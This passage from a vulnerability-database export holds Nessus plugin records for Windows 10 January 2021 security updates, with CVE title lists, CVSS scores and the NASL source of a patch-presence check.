(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. 
(CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 7, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598231: Windows 10 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1681", "CVE-2021-1691", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1692", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598231.NASL", "href": "https://www.tenable.com/plugins/nessus/144873", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft 
Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144873);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1692\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598231\");\n script_xref(name:\"MSFT\", value:\"MS21-4598231\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598231: Windows 10 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. 
It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. 
(CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598231/windows-10-update-kb4598231\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a8452c3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598231.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598231'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598231])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:52", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. 
(CVE-2021-1651)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)
 - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)
 - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)
 - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)
 - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)
 - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)
 - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)
 - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)
 - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)
 - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)
 - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)
 - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)
 - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)
 - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)
 - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)
 - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)
 - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)
 - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)
 - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)
 - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)
 - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)
 - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)
 - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)
 - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)
 - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)
 - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)
 - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)
 - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)
 - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)
 - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683, CVE-2021-1684. (CVE-2021-1638)
 - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)
 - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. (CVE-2021-1701)
 - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)
 - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)
 - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)
 - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)

Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.

Title: KB4598245: Windows 10 Version 1803 January 2021 Security Update
Synopsis: The remote Windows host is affected by multiple vulnerabilities.
Type: nessus (bulletin family: scanner); edition 6
Plugin ID: SMB_NT_MS21_JAN_4598245.NASL (script_id 144880, script version 1.8, plugin modification date 2021/02/12)
Reference: https://www.tenable.com/plugins/nessus/144880
Published: 2021-01-12; Modified: 2021-01-12 (vulnerability, patch and plugin publication date 2021/01/12)
CPE: cpe:/o:microsoft:windows
CVSS v2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C); temporal E:U/RL:OF/RC:C
CVSS v3: 7.8 (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H); temporal CVSS:3.0/E:U/RL:O/RC:C; score source CVE-2021-1668
Exploitability ease: No known exploits are available
Cross-references: IAVA 2021-A-0015, IAVA 2021-A-0022, IAVA 2021-A-0023, MSKB 4598245, MSFT MS21-4598245
See also: http://www.nessus.org/u?c8f58c04 (https://support.microsoft.com/en-us/help/4598245/windows-10-update-kb4598245)
Solution: Apply Cumulative Update KB4598245.
Plugin type: local; STIG severity: I; category: ACT_GATHER_INFO; family: Windows : Microsoft Bulletins
